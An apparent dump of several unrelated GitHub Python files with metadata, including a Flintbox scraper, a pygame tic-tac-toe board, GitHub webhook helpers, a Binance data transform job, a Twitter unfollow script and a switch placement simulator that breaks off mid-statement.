'decode_256': f1_d, 'fusion_128': f1_f, 'fusion_256': f2_f, 'fusion_128_wo_ba': f1_f_wo_ba}
for item in dic:
print(f"{item}-->{torch.equal(dic[item], ckpt[item])}")
| TaoHuang95/RQ-LLIE | test.py | test.py | py | 1,359 | python | en | code | null | github-code | 36 | [
{
"api_name": "models.arch.network.Network",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"l... |
17176681083 | import os
import logging
from logging import handlers
from api.common.jsonFormatter import JsonFormatter
# Logger that writes its records to a file as JSON lines.
class Api_logger_json():
    def __init__(self, name):
        super().__init__()
        # Fetch a dedicated logger keyed on "<name>_json".
        self.log = logging.getLogger(name + "_json")
        if not self.log.hasHandlers():
            # Log level
            self.log.setLevel(logging.INFO)
            # Attach a handler.
            # Base path of the process.
            bath_pash = os.getcwd()
            # Rotate at midnight, keeping 7 days of backups.
            # NOTE (translated from Japanese): when emitting JSON, non-ASCII
            # (Japanese) text gets garbled unless the json_log_formatter
            # library is patched — in that package's __init__.py, add
            # ``ensure_ascii=False`` to the return of ``to_json``.
            # Locate the installed package with ``pip show <package>``.
            file_handler = logging.handlers.TimedRotatingFileHandler(
                filename=bath_pash + '/log/app_json.log', encoding='UTF-8', when='MIDNIGHT', backupCount=7)
            # Keep non-ASCII characters readable in the output.
            formatter = JsonFormatter(json_ensure_ascii=False)
            file_handler.setFormatter(formatter)
            self.log.addHandler(file_handler)
    def getLogger(self):
        # Return the configured logging.Logger instance.
        return self.log
| war-bonds-rx78/python_flask_db_sample | api/common/logger_json.py | logger_json.py | py | 1,381 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "logging.handlers.TimedR... |
35217252222 | from enum import IntEnum
import requests
from urllib.request import urlopen
import urllib
from selenium import webdriver
from bs4 import BeautifulSoup
import http.client
from openpyxl import Workbook
from openpyxl import load_workbook
from openpyxl.writer.excel import ExcelWriter
from openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE
import json
from functools import reduce
import string
import re
import time
import math
http.client._MAXHEADERS = 1000
def urllib_download(IMAGE_URL, pName):
    """Download IMAGE_URL to '<sanitized pName>.jpg' in the working directory.

    Path separators are stripped from *pName* so it cannot escape the
    current directory. Failures are reported but not raised.
    """
    try:
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        # NOTE: installs the opener process-wide, as the original did.
        urllib.request.install_opener(opener)
        urllib.request.urlretrieve(IMAGE_URL, pName.replace("/","").replace("\\","")+'.jpg')
    except Exception as exc:
        # BUG FIX: the original bare ``except`` printed only 'no', hiding
        # both the failing URL and the reason.
        print(f'download failed for {IMAGE_URL}: {exc}')
def getNodeText(node):
    """Return the stripped text of a BeautifulSoup node, or '' if *node* is None."""
    # Use an identity check: ``node == None`` invokes __eq__, which tag-like
    # objects may override; ``is None`` is the correct (and idiomatic) test.
    if node is None:
        return ""
    return node.get_text().strip()
retryCount = 0
def requestJson(url):
    """Fetch *url* with browser-like headers and return the parsed JSON body."""
    headers = {
        'Content-Type': 'application/json; charset=utf-8',
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
    }
    response = requests.get(url, headers=headers)
    return json.loads(response.text)
def writeExcel(workSheet, headers, rowIndex, info):
    """Write one spreadsheet row: for each header, the matching *info* value
    (with openpyxl-illegal characters stripped) or "" when the key is absent.
    """
    cellIndex = 1
    for head in headers:
        try:
            if head in info:
                # Strip characters openpyxl refuses to store.
                content = ILLEGAL_CHARACTERS_RE.sub(r'', info[head])
                workSheet.cell(rowIndex, cellIndex).value = content.strip()
            else:
                workSheet.cell(rowIndex, cellIndex).value = ""
        except Exception as exc:
            # Narrowed from a bare ``except`` and made informative.
            print(f'row {rowIndex}, column {cellIndex} ({head}): {exc}')
        finally:
            # BUG FIX: the original incremented inside ``try``, so one failed
            # cell froze the column index and shifted every later value one
            # column to the left.
            cellIndex = cellIndex + 1
def getProductList(url, products):
    """Fetch one page of Flintbox technologies and append one dict per item
    to *products* (mutated in place).

    For each technology, the detail endpoint is queried to pull the inventor
    ("member") and licensing contact ("contact") out of the ``included`` list.
    """
    print(url)
    data = requestJson(url)
    for pInfoData in data["data"]:
        attrInfo = pInfoData["attributes"]
        uId = attrInfo["uuid"]
        pInfoDetail = requestJson("https://unc.flintbox.com/api/v1/technologies/"+uId+"?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596")
        includes = pInfoDetail["included"]
        # reduce keeps the LAST element of each type, or None if absent.
        member = reduce(lambda m, cur: cur if cur["type"] == "member" else m, includes, None)
        connector = reduce(lambda m, cur: cur if cur["type"] == "contact" else m, includes, None)
        pInfo = {
            "Title": attrInfo["name"],
            "Published": attrInfo["publishedOn"],
            "Webpage": "https://unc.flintbox.com/technologies/"+uId,
            "Inventor(s)": member["attributes"]["fullName"] if member != None else '',
            "Licensing Contact Person": connector["attributes"]["fullName"] if connector != None else '',
            "Licensing Contact Email": connector["attributes"]["email"] if connector != None else '',
        }
        products.append(pInfo.copy())
excelFileName="otcuncedu.xlsx"
wb = Workbook()
workSheet = wb.active
products = []
headers=[
'Title','Published','Webpage','Inventor(s)','Licensing Contact Person','Licensing Contact Email','备注'
]
# getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page=1&query=", products)
for pageIndex in range(1, 14):
getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page="+str(pageIndex)+"&query=", products)
for index,head in enumerate(headers):
workSheet.cell(1, index+1).value = head.strip()
for index,p in enumerate(products):
writeExcel(workSheet, headers, index + 2, p)
print("flish")
wb.save(excelFileName) | Just-Doing/python-caiji | src/work/20210807/otcuncedu.py | otcuncedu.py | py | 3,301 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "http.client.client",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "http.client",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "urllib.request.build_opener",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "urlli... |
16277554121 | import pygame
from constants import *
import numpy
class Board:
    """Tic-tac-toe board: owns grid state, rendering and win/tie detection.

    ``game_array`` holds 0 (empty), 1 (dot) or -1 (cross). Its first index is
    the board row (screen y) and the second the column (screen x) — see the
    (y, x) swap in put_mark().
    """
    # Initializing the board with screen as an input
    def __init__(self, screen) -> None:
        self.screen = screen
        self.game_array = numpy.zeros((WINDOW_SIZE // CUBE_SIZE, WINDOW_SIZE // CUBE_SIZE))
        self.draw_board()
        # 1 = dot's turn, -1 = cross's turn.
        self.turn = 1
        self.game_is_on = True
    # Drawing the grid
    def draw_board(self):
        # Lines at constant y (both endpoints share y = CUBE_SIZE * x), i.e.
        # the HORIZONTAL grid lines — the original comment had them swapped.
        for x in range(1, VERTICAL_LINES + 1):
            pygame.draw.line(self.screen, BLACK, (0, CUBE_SIZE * x), (CUBE_SIZE * 3, CUBE_SIZE * x), LINE_WIDTH)
        # Lines at constant x: the VERTICAL grid lines.
        for y in range(1, HORIZONTAL_LINES + 1):
            pygame.draw.line(self.screen, BLACK, (CUBE_SIZE * y, 0), (CUBE_SIZE * y, CUBE_SIZE * 3), LINE_WIDTH)
    # Changing turn: toggles between 1 (dot) and -1 (cross).
    def change_turn(self):
        self.turn *= -1
    # Checking if field is available (still 0, i.e. unmarked).
    def is_available(self, pos) -> bool:
        if self.game_array[pos[0]][pos[1]] == 0:
            return True
        return False
    # Putting mark on the field and changing turn
    def put_mark(self, pos):
        if self.is_available(pos):
            # -1 is cross
            if self.turn == -1:
                # Loading image of a cross
                img = pygame.image.load("Tic_Tac_Toe/resources/cross.png")
                img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
            # 1 is dot
            elif self.turn == 1:
                # Loading image of a dot
                img = pygame.image.load("Tic_Tac_Toe/resources/dot.png")
                img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
            self.game_array[pos[0]][pos[1]] = self.turn
            # Local x/y follow the array's (row, col) view; blit expects
            # (horizontal, vertical) pixels, hence the (y, x) order below.
            x = pos[0] * CUBE_SIZE + CUBE_SIZE // 6
            y = pos[1] * CUBE_SIZE + CUBE_SIZE // 6
            self.screen.blit(img, (y, x))
            self.change_turn()
    # Red line through the three winning cells; positions are (x, y) cells.
    def draw_winning_line(self, start_pos:tuple, end_pos:tuple):
        start_x = start_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
        start_y = start_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
        end_x = end_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
        end_y = end_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
        return pygame.draw.line(self.screen, RED, (start_x, start_y), (end_x, end_y), LINE_WIDTH)
    # Result banner plus the restart hint.
    def write_ending_text(self, text:str):
        font = pygame.font.Font(None, 36)
        text = font.render(f"{text}", True, BLACK)
        space = font.render("Press Space to Restart", True, BLACK)
        self.screen.blit(text, (15, 15))
        self.screen.blit(space, (CUBE_SIZE + CUBE_SIZE // 12, WINDOW_SIZE // 1.05))
    # Checking for win or tie; ends the game and draws the result if found.
    def check_for_win(self):
        # Rows: a sum of +/-3 over a row means three identical marks.
        for row in range(3):
            winning_row = 0
            for col in range(3):
                if self.game_array[row][col] == 1:
                    winning_row += 1
                elif self.game_array[row][col] == -1:
                    winning_row += -1
            # Checking if row is full of X or O
            if winning_row == 3:
                self.write_ending_text("Dot wins!")
                self.draw_winning_line((0, row),(2, row))
                self.game_is_on = False
                break
            elif winning_row == -3:
                self.write_ending_text("Cross wins!")
                self.draw_winning_line((0, row),(2, row))
                self.game_is_on = False
                break
        # Columns: note the swapped indices — this scans column ``row``.
        for row in range(3):
            winning_col = 0
            for col in range(3):
                if self.game_array[col][row] == 1:
                    winning_col += 1
                elif self.game_array[col][row] == -1:
                    winning_col += -1
            # Checking if column is full of X or O
            if winning_col == 3:
                self.write_ending_text("Dot wins!")
                self.draw_winning_line((row, 0),(row, 2))
                self.game_is_on = False
                break
            elif winning_col == -3:
                self.write_ending_text("Cross wins!")
                self.draw_winning_line((row, 0),(row, 2))
                self.game_is_on = False
                break
        # Diagonals (main and anti-diagonal).
        if self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == 3:
            self.write_ending_text("Dot wins!")
            self.draw_winning_line((0, 0),(2, 2))
            self.game_is_on = False
        elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == 3:
            self.write_ending_text("Dot wins!")
            self.draw_winning_line((0, 2),(2, 0))
            self.game_is_on = False
        elif self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == -3:
            self.write_ending_text("Cross wins!")
            self.draw_winning_line((0, 0),(2, 2))
            self.game_is_on = False
        elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == -3:
            self.write_ending_text("Cross wins!")
            self.draw_winning_line((0, 2),(2, 0))
            self.game_is_on = False
        # Tie: board full (no zeroes) with no winner declared above.
        num_of_zeroes = 0
        for row in range(3):
            for col in range(3):
                if self.game_array[row][col] == 0:
                    num_of_zeroes += 1
        if num_of_zeroes == 0 and self.game_is_on:
            self.write_ending_text("It's a tie!")
            self.game_is_on = False
| szczepanspl/tic_tac_toe | board.py | board.py | py | 5,668 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.draw.line",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "pygame.draw.line",
"... |
34109397178 | import requests
from tunga_tasks import slugs
EVENT_PUSH = 'push'
EVENT_CREATE = 'create'
EVENT_DELETE = 'delete'
EVENT_COMMIT_COMMENT = 'commit_comment'
EVENT_PULL_REQUEST = 'pull_request'
EVENT_PULL_REQUEST_REVIEW_COMMENT = 'pull_request_review_comment'
EVENT_ISSUE = 'issue'
EVENT_ISSUE_COMMENT = 'issue_comment'
EVENT_GOLLUM = 'gollum'
EVENT_RELEASE = 'release'
HEADER_EVENT_NAME = 'HTTP_X_GITHUB_EVENT'
HEADER_DELIVERY_ID = 'HTTP_X_GITHUB_DELIVERY'
PAYLOAD_ACTION = 'action'
PAYLOAD_ACTION_CREATED = 'created'
PAYLOAD_ACTION_DELETED = 'deleted'
PAYLOAD_ACTION_OPENED = 'opened'
PAYLOAD_ACTION_EDITED = 'edited'
PAYLOAD_ACTION_CLOSED = 'closed'
PAYLOAD_ACTION_REOPENED = 'reopened'
PAYLOAD_ACTION_PUBLISHED = 'published'
PAYLOAD_COMMENT = 'comment'
PAYLOAD_HTML_URL = 'html_url'
PAYLOAD_SENDER = 'sender'
PAYLOAD_USER = 'user'
PAYLOAD_USERNAME = 'login'
PAYLOAD_AVATAR_URL = 'avatar_url'
PAYLOAD_BODY = 'body'
PAYLOAD_CREATED_AT = 'created_at'
PAYLOAD_REF_TYPE = 'ref_type'
PAYLOAD_REF = 'ref'
PAYLOAD_REF_TYPE_REPO = 'repository'
PAYLOAD_REF_TYPE_BRANCH = 'branch'
PAYLOAD_REF_TYPE_TAG = 'tag'
PAYLOAD_REPOSITORY = 'repository'
PAYLOAD_PAGES = 'pages'
PAYLOAD_PAGE_NAME = 'page_name'
PAYLOAD_TITLE = 'title'
PAYLOAD_SUMMARY = 'summary'
PAYLOAD_HEAD_COMMIT = 'head_commit'
PAYLOAD_URL = 'url'
PAYLOAD_MESSAGE = 'message'
PAYLOAD_TIMESTAMP = 'timestamp'
PAYLOAD_ID = 'id'
PAYLOAD_TREE_ID = 'tree_id'
PAYLOAD_PULL_REQUEST = 'pull_request'
PAYLOAD_NUMBER = 'number'
PAYLOAD_MERGED = 'merged'
PAYLOAD_MERGED_AT = 'merged_at'
PAYLOAD_ISSUE = 'issue'
PAYLOAD_RELEASE = 'release'
PAYLOAD_TAG_NAME = 'tag_name'
REPOSITORY_FIELDS = ['id', 'name', 'description', 'full_name', 'private', 'url', 'html_url']
ISSUE_FIELDS = ['id', 'number', 'title', 'body', 'url', 'html_url', 'repository']
def transform_to_github_events(events):
    """
    Transforms Tunga integration events to corresponding GitHub events
    :param events: A list of Tunga events
    :return: A list of GitHub events
    """
    # Tunga slugs that do not map 1:1 onto a GitHub webhook event name.
    mapping = {
        slugs.BRANCH: [EVENT_CREATE, EVENT_DELETE],
        slugs.TAG: [EVENT_CREATE, EVENT_DELETE],
        slugs.PULL_REQUEST_COMMENT: EVENT_PULL_REQUEST_REVIEW_COMMENT,
        slugs.WIKI: EVENT_GOLLUM,
    }
    github_events = []
    for tunga_event in (events or []):
        mapped = mapping.get(tunga_event, tunga_event)
        if isinstance(mapped, list):
            github_events.extend(mapped)
        else:
            github_events.append(mapped)
    # De-duplicate before returning.
    return list(set(github_events))
def transform_to_tunga_event(event):
    """Map a GitHub webhook event name to its Tunga slug (identity if unmapped)."""
    if event in (EVENT_CREATE, EVENT_DELETE):
        return slugs.BRANCH
    if event == EVENT_PULL_REQUEST_REVIEW_COMMENT:
        return slugs.PULL_REQUEST_COMMENT
    if event == EVENT_GOLLUM:
        return slugs.WIKI
    return event
def extract_repo_info(repo):
    """Pick out only the REPOSITORY_FIELDS keys from a GitHub repository payload."""
    return {field: repo[field] for field in REPOSITORY_FIELDS}
def api(endpoint, method, params=None, data=None, access_token=None):
    """Issue a GitHub REST v3 request and return the ``requests`` response.

    *endpoint* is an absolute path such as '/repos/...'; *access_token*,
    when given, is sent as a ``token`` Authorization header.
    """
    headers = {
        'Accept': 'application/vnd.github.v3+json',
        # NOTE(review): 'application.json' looks like a typo for
        # 'application/json' — confirm before changing, as it is sent as-is.
        'Content-Type': 'application.json'
    }
    if access_token:
        headers['Authorization'] = 'token %s' % access_token
    return requests.request(
        method=method, url='https://api.github.com'+endpoint, params=params, json=data, headers=headers
    )
| jonathanzerox/tunga-api | tunga_utils/github.py | github.py | py | 3,509 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tunga_tasks.slugs.BRANCH",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "tunga_tasks.slugs",
"line_number": 79,
"usage_type": "name"
},
{
"api_name": "tunga_tasks.slugs.TAG",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_na... |
42350249999 | from flask import jsonify
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
import pandas as pd
import io
spark = SparkSession \
.builder \
.appName("Tweets Analysis using Python Saprk") \
.getOrCreate()
# spark is an existing SparkSession
df = spark.read.json("importedtweetsdata.json")
# Register the DataFrame as a SQL temporary view
df.createOrReplaceTempView("MobileTweetsData")
resultdf = spark.sql("SELECT SUBSTR(created_at, 0, 20) tweetsDate, COUNT(1) tweetsCount FROM MobileTweetsData \
where text is not null GROUP BY SUBSTR(created_at, 0, 20) ORDER BY COUNT(1) DESC LIMIT 5")
pd = resultdf.toPandas()
pd.to_csv('Query4Result.csv', index=False)
def query4_output():
    """Return the query-4 result rows as a JSON Flask response.

    NOTE(review): the module rebinds ``pd`` to the result DataFrame
    (``pd = resultdf.toPandas()``), shadowing the pandas import — so
    ``pd.to_json`` here is DataFrame.to_json, not the pandas module.
    """
    #return pd.to_json(orient='records')
    return jsonify({"Results":pd.to_json(orient='records')})
def query4_plot():
    """Render the query-4 result as a bar chart and return an in-memory
    PNG buffer rewound to byte 0."""
    pd.plot(kind="bar", x="tweetsDate", y="tweetsCount",
            title="Number of tweets for date")
    png_buffer = io.BytesIO()
    plt.savefig(png_buffer, format='png')
    png_buffer.seek(0)
    return png_buffer
| pujithasak/TweetsAnalysisPythonProject | AnalysisQuery4.py | AnalysisQuery4.py | py | 1,055 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession",
"line_number": 6,
"usage_type": "... |
9157699619 | import argparse
from typing import List
import config
import mysql.connector
from collections import OrderedDict
from binance_data import BinanceData
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def load(data: List['BinanceData']):
    """Batch-insert transformed kline rows into binance_transformed_data.

    Opens a fresh connection, inserts all rows in one executemany batch and
    commits; the cursor and connection are always closed, even on error.

    :param data: BinanceData objects to persist.
    """
    cnx = mysql.connector.connect(
        host=config.host,
        user=config.user,
        password=config.passwd,
        database="binance_transformed_data")
    try:
        cursor = cnx.cursor()
        try:
            # Define insert statement
            insert_statement = (
                "INSERT INTO binance_transformed_data (symbol, open_time, close_time, open_price, close_price, low_price, high_price, volume, quote_asset_volume, number_of_trades, taker_buy_base_asset_volume, taker_buy_quote_asset_volume, unused) "
                "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
            )
            # Prepare the values to be inserted, in column order.
            data_values = [(d.symbol, d.open_time, d.close_time, d.open_price, d.close_price, d.low_price, d.high_price, d.volume, d.quote_asset_volume, d.number_of_trades, d.taker_buy_base_asset_volume, d.taker_buy_quote_asset_volume, d.unused) for d in data]
            # Execute the batch insert; commit only if it succeeded.
            cursor.executemany(insert_statement, data_values)
            cnx.commit()
        finally:
            cursor.close()
    finally:
        cnx.close()
def transform(data: List['BinanceData'], interval: int) -> List['BinanceData']:
    """Aggregate consecutive klines into coarser intervals.

    Every *interval* consecutive rows are combined into one (e.g. five
    1-minute klines become one 5-minute kline); a final partial chunk is
    combined as-is. Rows are assumed ordered by open_time ascending.

    :param data: source rows.
    :param interval: number of source rows per combined row; must be > 0.
    :raises ValueError: if interval is not positive.
    :return: list of combined BinanceData rows.
    """
    if interval <= 0:
        raise ValueError("interval must be a positive number of rows per bucket")
    transformed_data = []
    for i in range(0, len(data), interval):
        chunk = data[i:i + interval]  # slicing already clamps at len(data)
        first = chunk[0]
        last = chunk[-1]
        # Seed extrema from the first row's low; the loop below still visits
        # first.high_price, so the maximum comes out correct.
        low_price = high_price = first.low_price
        volume = quote_asset_volume = number_of_trades = taker_buy_base_asset_volume = taker_buy_quote_asset_volume = 0
        for d in chunk:
            low_price = min(low_price, d.low_price)
            high_price = max(high_price, d.high_price)
            volume += d.volume
            quote_asset_volume += d.quote_asset_volume
            number_of_trades += d.number_of_trades
            taker_buy_base_asset_volume += d.taker_buy_base_asset_volume
            taker_buy_quote_asset_volume += d.taker_buy_quote_asset_volume
        transformed_data.append(BinanceData(
            symbol=first.symbol,
            open_time=first.open_time,
            close_time=last.close_time,
            open_price=first.open_price,
            close_price=last.close_price,
            low_price=low_price,
            high_price=high_price,
            volume=volume,
            quote_asset_volume=quote_asset_volume,
            number_of_trades=number_of_trades,
            taker_buy_base_asset_volume=taker_buy_base_asset_volume,
            taker_buy_quote_asset_volume=taker_buy_quote_asset_volume,
            unused=last.unused
        ))
    return transformed_data
def get_in_time_range(symbol, startTime: int, endTime: int, limit=500) -> List['BinanceData']:
    '''
    Get a list of BinanceData from the database within a specified time range.

    Pages through binance_source_data.binance_data with LIMIT/OFFSET until an
    empty page is returned; cursor and connection are always closed.

    :param symbol: trading-pair symbol to filter on.
    :param startTime: The start of the time range (unix time), inclusive.
    :param endTime: The end of the time range (unix time), inclusive.
    :param limit: page size for the OFFSET-based pagination.
    :return: a list of BinanceData ordered by open_time ascending.
    '''
    cnx = mysql.connector.connect(
        host=config.host,
        user=config.user,
        password=config.passwd,
        database="binance_source_data")
    data = []
    query = ("SELECT * FROM binance_data "
             "WHERE open_time >= %s AND open_time <= %s AND symbol = %s "
             "ORDER BY open_time ASC "
             "LIMIT %s OFFSET %s")
    try:
        cursor = cnx.cursor(dictionary=True)
        try:
            offset = 0
            while True:
                cursor.execute(query, (startTime, endTime, symbol, limit, offset))
                chunk = cursor.fetchall()
                if not chunk:
                    break
                for row in chunk:
                    # Keyword order matches the BinanceData constructor.
                    binance_data_dict = OrderedDict([
                        ('symbol', row['symbol']),
                        ('open_time', row['open_time']),
                        ('open_price', row['open_price']),
                        ('high_price', row['high_price']),
                        ('low_price', row['low_price']),
                        ('close_price', row['close_price']),
                        ('volume', row['volume']),
                        ('close_time', row['close_time']),
                        ('quote_asset_volume', row['quote_asset_volume']),
                        ('number_of_trades', row['number_of_trades']),
                        ('taker_buy_base_asset_volume', row['taker_buy_base_asset_volume']),
                        ('taker_buy_quote_asset_volume', row['taker_buy_quote_asset_volume']),
                        ('unused', row['unused'])
                    ])
                    data.append(BinanceData(**binance_data_dict))
                offset += limit
        finally:
            cursor.close()
    finally:
        cnx.close()
    return data
def transform_job(symbol, startTime, endTime, interval):
    """Fetch raw klines for *symbol* in [startTime, endTime], aggregate them
    *interval* rows at a time, and persist the combined rows."""
    raw_rows = get_in_time_range(symbol, startTime, endTime)
    combined_rows = transform(raw_rows, interval)
    load(combined_rows)
def main():
    """CLI entry point: validate the requested time range, then run the
    transform/load job."""
    args = parse_args()
    symbol = args.symbol
    startTime = int(args.startTime)
    endTime = int(args.endTime)
    interval = int(args.interval)
    if startTime >= endTime:
        raise ValueError(f"startTime returns trades from that time and endTime returns trades starting from the endTime"
                         f"including all trades before that time. startTime must be smaller than endTime")
    transform_job(symbol=symbol, startTime=startTime, endTime=endTime, interval=interval)
def parse_args(argv=None):
    """Parse command-line arguments for the transform/load job.

    :param argv: optional explicit argument list (defaults to sys.argv[1:]),
        which also makes the parser testable without patching sys.argv.
    :return: the parsed argparse.Namespace.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--symbol', type=str, help='trading pair symbol, e.g. BTCUSDT')
    parser.add_argument('--startTime', type=int, help='range start (unix time, inclusive)')
    parser.add_argument('--endTime', type=int, help='range end (unix time, inclusive)')
    parser.add_argument('--interval', type=int, help='number of source rows combined per output row')
    return parser.parse_args(argv)
# Script entry point: parse CLI args and run the transform/load job.
if __name__ == '__main__':
    main()
{
"api_name": "typing.List",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "mysql.connector.connector.connect",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "mysql.connector.connector",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_... |
34729716556 | #!/usr/bin/python3
from twitter import *
import time
import json
# Load the four OAuth credentials from conf.json and open the API client.
with open('./conf.json') as file: conf = json.load(file)
tw = Twitter(auth=OAuth(conf['token'], conf['token_key'], conf['con_sec'], conf['con_sec_key']))
maxcount = 5000
friends = []
followers = []
# Page through the friend ids (accounts this user follows); the API marks
# the last page with next_cursor == 0.
res = tw.friends.ids(count=maxcount)
cursor = -1
while cursor != 0:
    for id in res['ids']: friends.append(id)  # NOTE(review): `id` shadows the builtin
    cursor = res['next_cursor']
    res = tw.friends.ids(count=maxcount,cursor=cursor)
# Same pagination for the followers list.
res = tw.followers.ids(count=maxcount)
cursor = -1
while cursor != 0:
    for id in res['ids']: followers.append(id)
    cursor = res['next_cursor']
    res = tw.followers.ids(count=maxcount,cursor=cursor)
print("%s friends (users subscribed by the account)." % len(friends))
print("%s followers (users following the account)." % len(followers))
print("\n")
# Unfollow every account we follow that does not follow back.
friendsOnly = list(set(friends) - set(followers))
for uid in friendsOnly:
    print("uid: %s" % uid)
    res = tw.friendships.destroy(user_id=uid)
print("%i friendsOnly removed : %s\n" % (len(friendsOnly), friendsOnly))
| jdxlabs/twitter_diff | remove_friendsonly.py | remove_friendsonly.py | py | 1,048 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 5,
"usage_type": "call"
}
] |
8402296505 | from argparse import ArgumentParser
import json, logging
import seeker.podSeeker as Seeker
import judge.simpleJudge as Judge
import updater.simpleUpdater as Updater
class installed_query_info():
    """Record of a query installed on a switch: the query id plus the ids
    of its source and destination hosts."""

    def __init__(self, query_id, src_id, dst_id):
        """Store the identifiers that describe one installed query."""
        self.query_id, self.src_id, self.dst_id = query_id, src_id, dst_id
# initialize switch perference weight
def init_env():
    """Create the initial per-switch state for the placement simulation.

    Returns:
        tuple: (switch_weights, switch_loads) — a list of 20 zeroed
        preference weights and one independent, empty task list per switch.
    """
    total_switch_size = 20
    switch_weights = [0] * total_switch_size
    # One *distinct* list per switch; note [[]] * n would alias a single list.
    switch_loads = [[] for _ in range(total_switch_size)]
    return switch_weights, switch_loads
if __name__ == "__main__":
    # CLI: -q/--query points at the JSON file holding the query list.
    parser = ArgumentParser()
    parser.add_argument("-q", "--query", help="Query input file location", dest="query_location", default="./data/queries.json")
    args = parser.parse_args()
    logging.basicConfig(level=logging.INFO)
    # Per-switch preference weights and per-switch installed-task lists.
    switch_weights, switch_loads = init_env()
    with open(args.query_location, 'r') as inputQueries:
        unparsed_queries = inputQueries.read()
        queries = json.loads(unparsed_queries)
        for query in queries:
            # Candidate switches on the src->dst path of a pod_scale=4 fat-tree:
            # the two edge switches, their aggregation switches, and the cores.
            edge_sw1, edge_sw2 = Seeker.find_edge_switch_on_path(
                switch_id1=query['src_host_id'],
                switch_id2=query['dst_host_id'],
                pod_scale=4)
            aggr_sw1, aggr_sw2 = Seeker.find_aggr_switch_on_path(
                edge_id1=edge_sw1,
                edge_id2=edge_sw2,
                pod_scale=4)
            core_sws = Seeker.find_core_switch_on_path(pod_scale=4)
            # Accumulate the current weight of each placement option.
            edge_weight_1 = switch_weights[edge_sw1]
            edge_weight_2 = switch_weights[edge_sw2]
            aggr_weight_1, aggr_weight_2, core_weight = 0, 0, 0
            hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4 = 0, 0, 0, 0
            for aggr_sw in aggr_sw1:
                aggr_weight_1 += switch_weights[aggr_sw]
            for aggr_sw in aggr_sw2:
                aggr_weight_2 += switch_weights[aggr_sw]
            for core_sw in core_sws:
                core_weight += switch_weights[core_sw]
            # Hybrid options pair one aggregation switch with two core switches.
            hybrid_sw1 = [aggr_sw1[0], core_sws[0], core_sws[1]]
            hybrid_sw2 = [aggr_sw1[1], core_sws[2], core_sws[3]]
            hybrid_sw3 = [aggr_sw2[0], core_sws[0], core_sws[1]]
            hybrid_sw4 = [aggr_sw2[1], core_sws[2], core_sws[3]]
            for sw_id in hybrid_sw1:
                hybrid_weight_1 += switch_weights[sw_id]
            for sw_id in hybrid_sw2:
                hybrid_weight_2 += switch_weights[sw_id]
            for sw_id in hybrid_sw3:
                hybrid_weight_3 += switch_weights[sw_id]
            for sw_id in hybrid_sw4:
                hybrid_weight_4 += switch_weights[sw_id]
            # Pick the cheapest option, then bump the weight of its switch(es).
            chosen_pos = Judge.find_lowest_cost_node(
                [edge_weight_1, edge_weight_2, aggr_weight_1, aggr_weight_2, core_weight,
                 hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4],
                [edge_sw1, edge_sw2, aggr_sw1, aggr_sw2, core_sws, hybrid_sw1, hybrid_sw2,
                 hybrid_sw3, hybrid_sw4])
            Updater.update_weight(weights=switch_weights, pos=chosen_pos)
            # Record the installed query on every switch of the chosen option
            # (chosen_pos may be a single switch id or a list of ids).
            installed_query = installed_query_info(query_id=query['query_id'],
                src_id=query['src_host_id'], dst_id=query['dst_host_id'])
            if isinstance(chosen_pos, list):
                for pos in chosen_pos:
                    switch_loads[pos].append(installed_query)
            elif isinstance(chosen_pos, int):
